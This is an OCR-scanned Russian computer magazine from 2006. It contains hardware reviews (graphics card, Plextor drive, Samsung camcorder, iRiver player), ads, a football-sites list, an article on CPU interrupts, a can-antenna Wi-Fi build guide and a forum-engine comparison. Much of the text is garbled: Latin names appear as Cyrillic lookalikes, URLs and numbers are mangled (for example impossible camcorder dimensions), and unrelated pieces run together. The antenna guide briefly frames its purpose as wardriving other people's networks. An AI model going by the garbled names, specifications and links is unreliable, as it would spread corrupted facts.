лятора, смещенного вбок относительно центра. Будучи заключенной 
в пластмассовый кожух, конструкция довольно эффективно продувается, 
причем воздушный поток направлен прямо на элементы питания — как ви- 
дишь, не обижен никто. Правда есть у кулера и один минус: модули памя- 
ти он не затрагивает, а, так как они не снабжены радиаторами, рассчиты- 
вать на высокий уровень разгона едва ли придется. Во-вторых, на плате 
размещено целых 512 Мб памяти СЮОЯ-3, что свойственно больше топо- 
вым видеоадаптерам, чем решениям Міббіе-Епб! Работает она на частоте 
1300 МГц, что в сочетании с 485 МГц по чипу самым благоприятным обра- 
зом сказывается на производительности (для справки: референс имеет 
рабочие частоты 425/1000 МГц). 

Добавим, что платой поддерживаются технологии 8І_І, РЮТѴ и все наработки, 
свойственные поколению І4ѴЮІА ОеРогсе 6 — разве что ѴІѴО отсутствует (но 
это уже другая история). 

В итоге мы имеем неплохую, но не выдающуюся плату, достойно закрываю- 
щую шестую линейку чипсетов КІѴЮІА ОеРогсе. 



ВРЕМЯ ЗАПИСИ ДИСКОВ: 

СР В 52х: 2:38 

СР-ВѴѴ 24х: 3:47 

РѴР+В 8х: 7:56 

РѴР+ВѴѴ 4х: 14:42 



Ріехіог представил новую модель оптического драйва РХ755А. Эволюция приво- 
дов этой компании со времен модели РХ716А привносила сравнительно мел- 
кие, можно сказать, косметические доработки в каждую последующую модель. 
Добавлялась и опять исчезала поддержка формата ЭѴЭ-ВАМ, и неизменно 
росли скорости записи основных типов носителей. Так, в РХ755А (по сравне- 
нию с предыдущей моделью РХ750А) увеличилась скорость записи двухслой- 
ных болванок +Я Э1_ (с 8х до Юх) и поднялась скорость записи СЭ-Р дисков 
(с 40х до 48х). Вроде бы для новой модели — пустяк, однако самые важные от- 
личия никак не связаны со скоростью записи драйва. В данной модели введе- 
на технология РІехЕгазег, которая позволяет уничтожить информацию на любом 
записываемом оптическом носителе. Раньше такое было возможно только с пе- 
резаписываемыми дисками. Принцип технологии довольно прост: привод пов- 
торно осуществляет запись в таблице размещения или в области данных, тем 
самым полностью исключая возможность считывания информации с носителя. 
Также в данной модели значительно переработана техника управления страте- 
гией записи. Во-первых, помимо подстройки скорости во время записи, осуще- 
ствляется динамическое регулирование мощности лазера. А во-вторых, теперь 
стало возможным изменение стратегий записи для любых носителей, включая 
и заводские предустановки, занесенные в прошивку привода по умолчанию. 
Всего в памяти привода может находиться 31 стратегия. И еще одно новшест- 
во касается технологии ОідаВес. Напомним, что эта технология позволяет раз- 
мещать на обычной СЭ-болванке больше или меньше данных, варьируя разме- 
ром углублений и плоскостей (ріі и Іапб). В данном драйве введены новые коэф- 
фициенты уплотнения для данной технологии. Фактический объем размещае- 
мой информации может меняться от 480 до 924 МБ. В комплект Яеіаіі версии 
привода, помимо него самого, входит ЮЕ-шлейф, краткая инструкция по установ- 
ке, компакт-диск с фирменным программным обеспечением РІехТооІз, а также 
две сменные панели на фронтальную часть привода (белого и черного цвета). 
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Ноутбук 50* ОѴѴ 36 



50® на базе 

технологии Іпіеі® Сепігіпо™ 
для мобильных ПК 



■ размер и разрешение экрана 15.4" 

\Л/5ХѲА+( 1680x1 050) 

■ встроенный проигрыватель (возможность 
проигрывания дисков без загрузки системы) 

■ устройство чтения карт памяти 

■ беспроводная сеть ѴѴіРі 

■ встроенный ЫиеІооІН 

■ сумка в комплекте 




г. Москва "Цефей" (495) 730-0164 «Нобел» (495) 784-76-36 г. Санкт-Петербург «Нобел» (812) 259-85-57 г. Подольск Системная Автоматизация 
торговли (27) 68-02-79 г. Северодвинск м-н "Техномир"(8184) 527-000, (8184) 52-80-94 г. Архангельск «Группа Север» (8182) 66-19-61 
г. Пермь «КѴІЫІК» (3422) 92-98-98, (3422) 98-54-56 г. Магнитогорск «ІІСТ» (3519) 27-89-01 

ѵѵѵѵѵѵ.8СІ2Ь.ги 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепітіпо, Сепітіпо Іодо, Соге Іпзісіе, Іпіеі , , ІпіеІ Соге, ІпТеІ Іодо, ІпіеІ Іпзісіе, Іпіеі Іпзісіе Іодо, ІпТеІ ЗреесІЗІер, Іпіеі Ѵііѵ, I пТеІ Хеоп, Ііапіит, Ііапіит 
Іпзісіе, Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпіеІ или ее 
подразделениям на территории США и других стран. 








Затзипд МШІКЕТ $рогІ8 
Сатсогсіег (ѴР-ХІЮЬ 

Система записи видео: МРЕ04, АѴІ (разрешение до 720x576) 

Система записи фото: ЦРЕО (разрешение до 800x600) 

Система записи аудио: МРЗ 

Встроенная память: 1 Гб 

Матрица: СРС (с зарядовой связью), 800000 пикселей 

ЖК-дисплей: 2 дюйма, 210000 пикселей 

Увеличение: хЮ (оптически), хЮО (цифра) 

Интерфейс подключения: тіпі Ц5В 2.0 Ні-5реесІ 

Размеры, мм: 586x927x263 

Вес, гр: 1 50 

Дополнительно: внешний видеомодуль, крэдл для подключения к компьютеру, наушники, 
чехлы для переноски 



Компания Затзипд представила нам очень интересное устройство — малень- 
кую удобную цифровую видеокамеру, основное предназначение которой — 
спортивная съемка. Размером со студенческий билет (и толщиной всего 2,5 
см), эта малышка легко умещается в кармане, однако в комплекте идет спе- 
циальный чехол для закрепления на поясе. Камера очень проста в управле- 
нии и освоиться с основными функциями съемки можно всего за несколько 
минут. Среди режимов управления присутствуют как установки вручную тех 
или иных характеристик, так и автоматическое их определение в зависимос- 
ти от окружающей обстановки. Довольно удобным является небольшой дисп- 
лей, отображающий процесс съемки и дающий доступ ко всем функциям. Ин- 
тересно, что при повороте вперед изображение автоматически переворачи- 
вается. Поскольку это «спортивная» камера, то ее корпус прорезинен, чтобы 
воизбежание попадания влаги внутрь и для исключения скольжения. В допол- 
нение к основной камере идет выносной модуль, который можно при помощи 
специального провода соединить с корпусом и производить запись, что явля- 
ется очень удобным при выполнении каких-то действий, требующих активно- 
го участия «оператора». 

Кроме основного набора проводов подключения, в комплекте имеется крэдл, 
предназначенный для установки в него съемочного аппарата, и соединения его 
с компьютером (для передачи информации), а также подключения зарядного 
устройства. Камера является попутно и цифровым диктофоном, и МРЗ-пле- 
ером, поэтому в коробке обнаружились и неплохие мини-наушники. 
Подключение к компьютеру не вызывает проблем, а скорость передачи данных 
весьма высока благодаря высокоскоростному ЕІ5В 2.0 Ні-ЗреесІ порту, поэтому 
устройство возможно использовать и в качестве портативного хранилища ин- 
формации размером до гигабайта. Конечно же, данную новинку можно исполь- 
зовать и в качестве дополнения к чату — можно устраивать видеоконференции. 
В итоге хочется сказать, что данное устройство удалось на славу и станет 
весьма полезным приобретением для любителей активной спортивной жизни, 
желающих запечатлеть свои достижения. 



ІЯІѴЕЯ N11 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Объем памяти, Гб: 1 

Поддерживаемые форматы: МРЗ, ОСО, ѴѴМА, АЗР 
Дополнительно: РМ-тюнер, встроенный микрофон 

Соотношение сигнал\шум, дБ: 90 

Время автономной работы, ч: ~13 

Возможность обновить прошивку: есть 

Габариты, мм: 27.2x49.8x13.3 

Вес, г: 22 

Интерфейс: ЦЗВ 2.0 



Сегодня на рынке присутствует огромное количество МРЗ-плееров, хра- 
нящих информацию во ЯазМ-памяти. Практически любая крупная и не 
очень компания имеет в своем продуктовом пакете подобные устройства, 
снабженные собственным лейблом. Чтобы пользователь не утонул в этом 
море изобилия и сделал правильный выбор (то есть приобрел устройство 
именно этой марки), вендоры идут на различные ухищрения: тут марке- 
тинговые и рекламные компании, различные розыгрыши призов и так да- 
лее; добавление в плееры различных дополнительных функций, вроде бу- 
дильника и просмотра календаря, а также дизайнерские изыски и многое 
другое. В своем устройстве N11 компания ІЯІѴЕЯ решила объединить нес- 
колько подобных средств повышения покупаемости устройства. Во-пер- 
вых, это его дизайн. Плеер действительно несколько напоминает кулон, в 
связи с чем производитель рекомендует использовать его как украшение. 
Следовать этому совету или нет — личное дело каждого, но конструкция 
наушников из комплекта поставки как раз и рассчитана на такой способ 
ношения, чтобы плеер находился на груди. Корпус черный, блестящий, с 
серебряными обводами, очертания у него мягкие, так что выглядеть он бу- 
дет неплохо. Надо добавить, что габариты и вес плеера очень невелики, 
так что он вполне подойдет девушкам. На такой вывод наталкивает и удоб- 
ство меню — освоиться с ним очень просто, а ведь все знают, как боль- 
шинство барышень относится к технике сложнее тюбика помады или фла- 
кончика духов. Помимо внешней привлекательности, N11 имеет и хоро- 
ший функционал. Это возможность проиграть четыре популярных аудио- 
формата (для размещения треков есть гигабайт встроенной ЛазИ-памяти), 
плюс дополнительные возможности — прослушивание радио в ЕМ-диапа- 
зоне и использование N11 в качестве диктофона. Тут как раз стоит ска- 
зать о том, что качества звучания хорошее: громкость достаточная, а звук 
чистый. Связь с ПК осуществляется по шине 115В 2.0, коннектор которой 
хитро спрятан под съемной крышечкой (он не выведен наружу, поэтому не 
нарушает целостности внешнего вида устройства). Для непосредственно- 
го соединения в комплект поставки входит переходник. Кстати, есть воз- 
можность обновления встроенного ПО, что продлит срок службы плеера. 
В общем, если ищешь красивое и функциональное устройство, то ІЯІѴЕЯ 
N11 станет для тебя отличным выбором. 
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А'І'Л'І'Л'І'Л'іуѵ'І'ЛЧ'ЛЧ'Л'І'Л 



Надежная клавиатура 
и геймерская мышь уже в комплекте 



Неуязвимость, которая достигается с компьютером Ехсітег™ Сате Мазіег на базе Процессора 
Іпіеі® Репііит® 4 640 с технологией НТ, превращает любое сражение в самопознание, а пределы 
возможного перестают существовать... 



№ 




ЖИМЕРбате Мааіег 

Іпіеі® Репііит® 4 640 с технологией НТ 
(2 МБ, 3.21Гц, 800МГц) 

МЬ М5І 915 СотЬо 2-Р 

ОС МісгозоП® ѴѴіпсІоѵѵз® ХР Месііа Сепіег ЕсНііоп (Виз) 
Память 0ѴК2 РВАМ 1ГБ 533 МГц РС-4200/4300 
Видео ИѴЮІА 6800-С5256Е 
СагсІ Веасіег 6 іп 1 
Жесткий диск 160ГБ, 

5АТА-300, 7200грт, 8МБ Привод йѴ0±ВѴѴ 
Порт РігеѴѴіге 



Антивирус 




ехсітеп 



ѴѴеЬ: ѵѵѵѵѵѵ.ехсітег.сот/датета5Іег/ 



СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ 



.ехсітег. 



Компания Эксимер рекомендует 
лицензионную ОС МісгозоТС® ѴѴіпсІоѵѵз® ХР 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, ІпіеІ, , Іпіеі Соге, ІпіеІ Іодо, Іпіеі Іпзісіе, ІпіеІ Іпзісіе Іодо, ІпіеІ ЗреесІЗіер, ІпіеІ Ѵііѵ, ІпіеІ Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, Репііит и Репііит 
Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 





Мяч МегсигіаІ 




1 





Рональдо 



Скорость - мой дар! 



Мяч МегсигіаІ Ѵарог 
Добавь динамику в игру! 



Игра становится все быстрое, и на это есть причина. 
Особенность нового МегсигіаІ Ѵарог в том, что, отрываясь 
от бутсы после удара, он ускоряется на 4% быстрее, 
чем любые мячи предыдущих поколений. Но и это не предел: 
восприимчивая кударам поверхность мяча с микрожелобками 
делает его ещё более управляемым и позволяет 
игрокам более точно направлять удары и пасы. 
Скорость и контроль - похоже, это отличное сочетание для атаки. 






*Скорость 

товар сертифицирован 



пікеТооІЬаІІ.сот 




ТЫ НИКОГДА НЕ ЗАДУМЫВАЛСЯ О ЗНАЧЕНИИ ЦИФР НА ФОРМЕ ИГРОКОВ? 
ЕСЛИ НЕТ, ТО СООБЩАЕМ ТЕБЕ, ЧТО РАНЬШЕ ПО НОМЕРУ ФУТБОЛИСТА 
МОЖНО БЫЛО ОПРЕДЕЛИТЬ ЕГО ПОЗИЦИЮ НА ПОЛЕ. И ХОТЯ С ПОЯВЛЕНИЕМ 
ТОТАЛЬНОГО ФУТБОЛА, КОГДА ИГРОК, НЕЗАВИСИМО ОТ СВОИХ НОМИНАЛЬ- 
НЫХ ОБЯЗАННОСТЕЙ, СПОСОБЕН ПО СИТУАЦИИ СЫГРАТЬ НА ЛЮБОЙ ПОЗИ- 
ЦИИ, НЕОБХОДИМОСТЬ «НУМЕРАЦИИ» ОТПАЛА, ЛУЧШИХ ИЗ ЛУЧШИХ ФУТБО- 
ЛИСТОВ В СВОИХ АМПЛУА ДО СИХ ПОР ОПРЕДЕЛЯЮТ ПО ИХ НОМЕРУ. 

ЭТИ 1 1 ИГРОКОВ — ОСНОВНОЙ СОСТАВ КОМАНДЫ. ЭТИ 1 1 ЦИФР — ПОКАЗА- 
ТЕЛЬ ИХ ЗНАЧИМОСТИ. ЭТИ 1 1 САЙТОВ — ЛУЧШИЕ РЕСУРСЫ О ФУТБОЛЕ. 
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НТТР://\Л/ѴѴ\Л/.\Л/ОПШЗТАОЮМЗ.СОМ 

НЕПРЕДСКАЗУЕМЫЙ 
ЛЕВЫЙ ЗАЩИТНИК 



Ресурс, напрямую нѳ связанный | 
с футболом, но от этого не менее] 
интересный. Иллюстрированная Щ 
информация о любом стадионе в мире. [ 



НТТР://ѵѵѵѵѵѵ.РІРРЬ.ОК(3 

ВАЖНЫЙ 

ЦЕНТРАЛЬНЫЙ ЗАЩИТНИК 



I Официальный сайт Российской | 

I Премьер-лиги. Главная информация | 

I о нашем чемпионате, включая данные [1 
I обо всех клубах! 
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РПТРЖОМАЫОА.СОМ.РШ 

ВЕСЕЛЫЙ ВРАТАРЬ 



Пожалуй, самый забавный [ 

I сайт. Обширная коллекция] 

I анекдотов, шуток, карикатур д 
I и комментаторских ляпов! 
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РІТТР://ѵѵѴѴѴѴ.РАЫАТ5.РІІІ 

ЦЕПКИЙ СТОЛПЕР 



V \ 



I Этот фанатский ресурс - 
I Интернет-флагман ] 

[ отечественного боления. | 

Море ссылок на гостевые книги ^ 
, и соответствующие сайты и, 
і конечно, «свои» новости, і 



ргпрѵ/штроотвАнѳтіі.оріе 

МУДРЫЙ 

ЦЕНТРАЛЬНЫЙ ЗАЩИТНИК 



Ч М 



Отличный энциклопедический сайт. | 
Любопытная подборка фактов I 
из истории футбола, полезные] 
сведения о турнирах, клубах и людях] 
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РІПР://РООТВАІ_І_.КІіиСРІКІ.РІІІ 

КОМПЕТЕНТНЫЙ 
ПРАВЫЙ ЗАЩИТНИК 



“ Ж. I 

■ ?! 



| Один из авторитетнейших | 

1 информационных ресурсов.| 
Компетентные новости | 
и свежие результаты со всего мира] 
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ПОДКОВАННЫЙ 
ЛЕВЫЙ ПОЛУЗАЩИТНИК 



I Очеловеченный сайт о суровой 
1 мужской игре. Биографии, истории 
из жизни и высказывания многих 
известных и не очень игроков, 
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РІТТРѴЛЛЛЛЛЛ/.ѵЮСА.СОМ 

ПЕРСПЕКТИВНЫЙ ЦЕНТРАЛЬНЫЙ 
НАПАДАЮЩИЙ 



Настоящий футбольный Живои | | , 
Журнал! Полезный ресурс, с помощью 
которого можно познакомиться с про-] 
фессионалами, получить их совет, И 
и, конечно, насладиться их игрой. ■ 
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Единственный виртуальный футбольный 
менеджер, который позволит не просто! 
потешить самолюбие, но при удачном Я 
раскладе еще и денег заработать. ■ 
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КРАЙНИМ нападающим 
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Возможно, самый красивый сайті 
о футболе. Удобная навигация, ■ 
отличные фотографии и схемы | 
уникальных технологий компании. 
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ПРАВЫЙ полузащитник 

\ я . 



■ Целый кладезь ссылок на все, щ 
Л что хоть как-то связано с футболом. 
М Вот только русский интерфейс Щ 
(отсутствует. ■ 
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Прервись 
на минутку 

Работа прерываний в операционных системах 

Не секрет, что прерывания являются важнейшей час- 
тью работы операционной системы. Но задумывался 
ли ты, что это такое? Для чего они нужны и как рабо- 
тают? Едва ли. 

1 1НРО I 

ПРЕРЫВАНИЯ ^ Л 




030 



ХАКЕР 04 /88/ 06 



Стань настоящим 
диджеем! 



ВНУТРЕННИЕ ПРЕРЫВАНИЯ, ОНИ ЖЕ 
ИСКЛЮЧЕНИЯ (ЕХЕРТЮІЧ), ВОЗНИКАЮТ 
В РЕЗУЛЬТАТЕ АВАРИЙНОЙ СИТУАЦИИ В 
ХОДЕ ВЫПОЛНЕНИЯ НЕКОТОРОЙ ИНС- 
ТРУКЦИИ САМОЙ ПРОГИ. 



Прерывание и исключения 

В архитектуре любого процессора предусмотрены особые случаи, 
когда процессор прерывает выполнение текущей программы и 
немедленно передаетуправление программе-обработчику, специ- 
ально написанной для обработки подобной ситуации. Такие ситуа- 
ции встречаются сплошь и рядом. Чтобы это осознать, предлагаю 
немного пофантазировать. Абстрагируйся от современных много- 
задачных систем, оснащенных мощными системными планиров- 
щиками. Просто представь, что всего этого не существует — есть 
лишь «голая» однопроцессорная система. Если этой системе дать 
невыполнимое задание, скажем, подсчитать точное значение чис- 
ла Пи, то она будет выполнять его целую вечность. Рано или поздно 
этот процесс придется остановить, но как? Процессор ни на что 
не реагирует — просто пыхтит над заданным ему вопросом. Вот 
тут-то и потребуется прерывание. Ты жмешь нужную клавишу на 
клавиатуре, и контроллер сигналом сообщает об этом процессору. 
Этот сигнал с сообщением, по большому счету, и есть прерывание. 
Оно понятно процессору, поэтому его внутренние механизмы пре- 
рывают выполнение текущей последовательности команд и обра- 
щаются к специальной подпрограмме — обработчику прерывания. 
По умолчанию в нем прописано много всякой всячины (например, 
перезагрузка по СІгІ-АИ-ЭеІ), но для того, чтобы реализовать оста- 
новку процесса, необходимо его немного видоизменить. Достаточ- 
но добавить туда обработку нужной нам клавиши, обозначив для 
нее действие «создать флаг завершения вычислений» — и готово. 
Теперь, когда управление возвратится обратно в программу, она 
получит останавливающий ее флаг и прекратит вычисления. 
Подобный подход активно использовался программистами под 
ЭОЗ. Сейчас, когда механизмы многозадачности возложены на 
саму ОС, в нем нет прямой необходимости. Да и обратиться к обра- 
ботчикам прерывания напрямую уже не так легко. 

Вместе с тем прерывания по-прежнему выполняют ведущую роль в 
планировании процессов — просто ты этого не замечаешь. 

Типы прерываний 

Рассмотренное нами прерывание — это лишь частный случай. На 
самом деле прерывания в компьютере бывают самые разные, и 
их даже можно классифицировать. В зависимости от источни- 
ка, они делятся на три больших класса: внешние, внутренние и 
программные. Внешние прерывания инициируются сигналами от 
аппаратных устройств (вернее их контроллеров): всевозможных 
устройств ввода-вывода, внешних накопителей, различной пе- 
риферии (принтеров, сканеров) и т.д. Именно поэтому внешние 
прерывания также называют аппаратными. Необходимость в них 
наглядно демонстрирует пример выше. Нажатие клавиатуры обя- 
зательно должно быть зафиксировано — ведь оно по идеи должно 
влиять на процесс дальнейших вычислений. Такие прерывания 
возникают между выполнением двух соседних инструкций, а после 
их обработки система продолжает выполнение процесса, начиная 
со следующей инструкции. Внутренние прерывания, они же ис- 
ключения (ехерііоп), возникают в результате аварийной ситуации 
входе выполнения некоторой инструкции самой проги. Примерами 
эксепшенов являются деление на ноль, ошибки защиты памяти, об- 
ращения по несуществующему адресу, попытка выполнить приви- 
легированную инструкцию в пользовательском режиме и т.п. Если 
бы не было соответствующих прерываний, то отследить и грамотно 
обработать исключительные ситуации было бы невозможно. 

Что касается программных прерываний, то они возникают при вы- 
полнении особой команды процессора, и используются програм- 
мистом намеренно — в нужном участке кода он просто вставляет ас- 
семблерную команду ІІЧТ, указывая после нее номер прерывания. 

Приоретизация и маскирование прерываний 

У прерываний есть приоритет, с помощью которого они ранжиру- 
ются по степени важности и срочности. Механизм прерываний дол- 
жен поддерживать приоритезацию и маскирование прерываний. 




Купи диск в сетях магазинов 




и выигрывай призы на ДОпети 



Виртуальная школа Опе - единственная 
мультимедийная школа диджеинга в мире, 
дающая тебе возможность научиться играть 
на пластинках, СО, трЗ и даже бесплатно пройти 
эксклюзивный скретч-курс! 



Кроме того, благодаря этому диску ты узнаешь, 
как стать радиодиджеем, а зарегистрировавшись 
после покупки на шлл/.ф Опе.ш - как выиграть 
массу ценных призов! 



Будь первым, и первые призы могут стать твоими! 



Ищи диск в торговых сетях, указанных ниже, 

и на шш/.сІіОпе.ги/$Ііор$ 
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СХЕМА МАСКИРОВАНИЯ ПРЕДПОЛАГАЕТ ВОЗМОЖ- 
НОСТЬ ВРЕМЕННОГО МАСКИРОВАНИЯ ПРЕРЫВАНИЙ 
ЛЮБОГО КЛАССА НЕЗАВИСИМО ОТУРОВНЯ 
ПРИОРИТЕТА 



N 



Приоритезация подразумевает, что все существующие источни- 
ки, «рождающие» прерывания подразделяются на классы, а этим 
классам, в свою очередь, назначаются соответствующие уровни 
приоритетов запросов на прерывания. Приоритеты могут обслу- 
живаться как относительные, так и абсолютные. Обслуживание 
их запросов по схеме с относительными приоритетами заключа- 
ется в том, что при одновременном поступлении запросов преры- 
ваний из разных классов выбирается запрос, имеющий высший 
приоритет. Причем обработчик прерывания ни при каких условиях 
не может быть остановлен. В случае, когда более приоритетным 
прерываниям разрешается приостанавливать работу процедур 
обслуживания менее приоритетных прерываний, имеет место при- 
оритезации с абсолютными приоритетами.Упорядоченное обслу- 
живание запросов прерываний наряду со схемами приоритетной 
обработки запросов может выполняться механизмом маскирова- 
ния запросов. Собственно говоря, в описанной схеме абсолютных 
приоритетов выполняется маскирование — при обслуживании 
некоторого прерывания все запросы с равным или более низким 
приоритетом маскируются, то есть не обслуживаются. Схема мас- 
кирования предполагает возможность временного маскирования 
прерываний любого класса независимо от уровня приоритета. На 
практике это предоставляет массу возможностей. 

ЗАТЕМ АДРЕС ОБРАБОТЧИКА ПРЕРЫВАНИЯ ЗАГРУЖА- 
ЕТСЯ В СЧЕТЧИК КОМАНД 



Обработка на практике 

Вот обобщенная последовательность действий аппаратных и 
программных средств по обработке прерывания. Сначала проис- 
ходит первичное распознавания типа прерывания. В том случае, 
если прерывания подобного типа в данный момент запрещены 
(механизмом маскирования или приоритетной схемой), то цент- 
ральный процессор продолжает исполнение тех команд, которые 
идут своим ходом. Иначе, исходя из данных, которые поступили на 
вход процессора, происходит автоматический вызов обработчи- 
ка прерывания, адрес которого находится в специальной таблице 
операционной системы (таблица векторов прерываний). 

Далее автоматически сохраняется определенная часть кон- 
текста прерванного потока, которая позволит ядру возобновить 
процесс возникшего после обработки прерывания. Сохраняются 
значения счетчика команд, слова состояния машины, хранящего 
признаки основных режимов работы процессора (пример такого 
слова — регистр ЕРІ_А(33 в ІпіеІ Репііит) ит.д. 

Затем адрес обработчика прерывания загружается в счетчик 
команд, а в системные регистры загружаются данные, которые 
определяют режимы работы процессора при обработке прерыва- 
ния. После того как прерывание обработано ядром операционной 
системы, прерванный контекст восстанавливается, и работа по- 
тока возобновляется с прерванного места. Часть контекста вос- 
станавливается аппаратно по команде возврата из прерываний 
(например, адрес следующей команды и слово состояния маши- 
ны), а часть — программным способом, с помощью явных команд 
извлечения данных из стека. 

Правильное планирование процедур, вызываемых по преры- 
ваниям, — необходимое условие того, чтобы пользовательские 
потоки были спланированы правильно. Иначе в системе возмож- 
но появление таких ситуаций, когда операционная система будет 
длительное время занята какой-нибудь задачей управления стри- 
мером, сжимающим данные, в то время, когда высокоскоростной 
диск будет попросту простаивать. Тем самым будет заторможена 
работа многочисленных приложений, которые по своей природе 
вынуждены обмениваться данными с этим диском. Для того чтобы 
упорядочить работу обработчиков прерываний, в операционных 
системах используют такой же способ, что и для упорядочения ра- 
боты юзерских процессов — механизм приоритетных очередей. 



Таблица 

прерываний 



Регистр 

дескрипторной 

таблицы 

прерываний 



Физическая база Предел 







Программные прерывания позволяют передать управление 
подпрограмме с помощью специализированной инструк- 
ции процессора, такой как ШТ в процессорах ІпТеІ Рептіит. 
При выполнении подобной команды процессор начинает 
обрабатывать такую же последовательность команд, как и 
при возникновении внешнего или внутреннего прерывания, 
различие лишь в том, что прерывание происходит в пред- 
сказуемой, заранее известной точке программы. Отмечу, 
что все современные процессоры обладают инструкциями 
программных прерываний в системе команд. Инструкции 
программных прерываний появились в системе команд с 
той целью, чтобы сделать код программ зачастую более ком- 
пактным в сравнении с использованием стандартных команд 
выполнения процедур. 

Это легко объяснить тем, что разработчики процессора, как 
правило, резервируют для возможности обработки преры- 
ваний некоторое количество подпрограмм таким образом, 
что длина операнда в команде программного прерывания, 
который указывает на нужную подпрограмму, меньше, чем в 
команде перехода на подпрограмму. 

Например, в процессоре х86 (возьмем его для наглядности) 
предусмотрена возможность применения 256-ти программ 
обработки прерываний, поэтому в инструкции ШТ операнд 
имеет длину в один байт ( а инструкция ШТ 3 , которая пред- 
назначена для вызова отладчика, вся имеет длину один байт) 
Значение операнда команды ШТ просто является индексом 
в таблице из 256-ти адресов подпрограмм обработки пре- 
рываний, один из которых и используется для перехода по 
команде ШТ. При использовании команды САТЬ потребо- 
вался бы уже не однобайтовый, а двух- или четырехбайтовый 
операнд. Другой причиной применения программных пре- 
рываний вместо обычных инструкций вызова подпрограмм 
является возможность смены пользовательского режима 
на привилегированный одновременно с вызовом процеду- 
Р ЬІ это свойство программных прерываний поддержива- 
ется большинством процессоров. 



Это нужно знать! 

Любой уважающий себя кодер должен понимать как, когда и за- 
чем происходят прерывания. Без этого практически невозможно 
ловить ехерііоп’ы, правильно строить код, тесно работающий с 
процессором. Работе с прерываниями практически любому про- 
граммисту, ну и хакеру соответственно, приходится уделять много 
времени. Они существенно увеличивают эффективность и ста- 
бильность вычислительной системы. 

ВІЫАВУ ѴОІІВ’5 ~і~ 
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Сигналим без пощады 



Мануал по созданию внешних \Л/іРІ-антенн 

Если ты хоть раз в жизни занимался вар драйв ингом 
и изучением чужих АУі-Бі сетей, то, скорее всего, 
сталкивался с проблемой, когда сигнал от инте- 
ресующей тебя точки очень 
слабенький, соединение 
то и дело рвется, а поло- 
вина пакетов теряется 
в воздухе. Лучший 
способ решить эту 
проблему — ис- 
пользовать вне- 
шнюю антенну. 
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К игле Ы-іуре припаян 
провод обмотки. Игла 
вставлена внутрь конне- 
ктора — он закреплен на 
пластине-отражателе. 

По науке, нужен был спе- 
циальный согласователь 
из медной фольги , но мы 
на него забили. 
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РС_20ЫЕ 




Диаметр банки 


Длина банки 


Расстояние от волновода до дна 


7,5 


31 


10,35 


8 


20,62 


6,87 


8,5 


17 


5,7 


9 


15,15 


5,05 


9,5 


13,96 


4,65 


10 


13,14 


4,38 




1 . Выбери подхо 
2 

ІШиійШІВ 

3. Просверли дырку 16 мм. 
ШШтіттятмтттттМтЫШшШМШШ 
кусочек длиной 3,07 см. 
ІМШВиіёйііИ 






^нтенна-банкс 



Жестяная банка 
из-под конфет. 
Диаметр — 10 см, в 
длину — 14см. 



Коннектор І\І-Іуре 
закреплен на банке 
в специальном мес- 
те. Его расположение 
очень важно. 



|Банка из-под кофе — Вгее. 



|Кусочек проволоки — Вгее| 



[Коннектор ІМ-Туре — 300 р. 



Излучателем работает 
кусок медной проволоки, 
припаянный к централь- 
ной игре коннектора. 
Длина очень важна. 



ЮОрІ 
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Виды рассады Осип Локос 



■Для лКзц^чй 
попьпуічесь 
удобными 



с рассадой 
Овіп Покос, 



Пий^йм;й|{ 

ЕЫИОСИГК СфК&НЦЙЗ 

нлйеданеэ 
солнце. прйержі’іе 
ПК Н копШ, чтобы 
Эдшицип к зескг' 
прЬшпа ЛЛЗБНО. 



,**ІІІ**ч 



0*учйіанит ісайнрапр-н ш р учу 
ВДШПНВ’Нгід уя&пичидат 
| ЦСІМПгі Дй^ір.'І 









Общая информация 




Конструктивный разговор 

Обзор альтернативных форумных движков 



Сразу бросается в глаза отсутствие графи- 
ки и ненапрягающий дизайн. Вроде бы ни- 
чего особенного, но мне сразу понравилась 
морда форума. Картинок нет — на моем 
А03І_-канале грузиться будет мгновенно. 
Админка на высоте. Создавать форумы 
очень просто, причем их тут же можно оп- 
ределить в группы. Разработчики сделали 
свой продукт максимально расширяемым и 
изменяемым. 



Распаковываем архив и заливаем в ката- 
лог файлы из каталога иріоаб. Заходим. 
Форум сообщает, что нет конфигурационно- 
го файла, и предлагает провести установку. 
Настроек здесь — необходимый минимум. 
Заполняем параметры доступа к базе МуЗОІ_ 
и реквизиты администратора. Далее инстал- 
лятор предлагает нам текст, который нужно 
вставить в файл сопіід.ріір и залить на сер- 
вер. Все заработало с первого раза. 



Впечатляет! Можно считать, что этот фо- 
рум пока стал лидером в моем субъектив- 
ном рейтинге. Стандартный набор фун- 
кций (баны, ранги юзеров, удаление ста- 
рых мессаг) можно расширить с помощью 
подключаемых плагинов. Но, к сожалению, 
такие полезные функции, как приватные 
сообщения и голосования, никогда не будут 
включены в состав рипВВ по умолчанию. 



Главная страница форума красивая и оп- 
рятная, графики немного — без излишеств. 
Сразу чувствуется забота о посетителях: тут 
и полноценный поиск, и просмотр сообще- 
ний со времени последнего визита, и расши- 
ренная система личных сообщений. Теперь 
проследуем в админку. А в ней прямо-таки 
изобилие. Настроек столько, что можно 
было бы запутаться, если бы они не были так 
хорошо оформлены и разнесены по темам. 



Тарбол, объемом 700 Кб, содержит сам 
форум и немного дополнительной инфор- 
мации о лицензировании. Загружаем на 
сервер, устанавливаем. Первая страни- 
ца просит сообщить название форума, 
параметры дгір-сжатия и учетную запись 
МуЗОІ_-базы. К сожалению, другие движки 
БД, даже РозідгеЗОЦ не поддерживаются. 
На второй странице создаем админский ак- 
каунт. Г отово. 



Не буду заниматься полным перечислением 
всего, что поддается переопределению, но 
уверен: этот форум удовлетворит даже ис- 
кушенного любителя адаптировать все под 
себя. Немаловажно, что ЗМР предъявляет 
минимальные требования к серверу и не 
будет тормозить в случае урезанных ресур- 
сов. Дополнительно доступно множество 
модов, конвертеров и тем для форума. Но 
есть и минус — нет локализации. 
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Даже твоя бабушка знает, что самый популярный форум в Интернете — рНрВВ. Установив его, ты можешь быть 
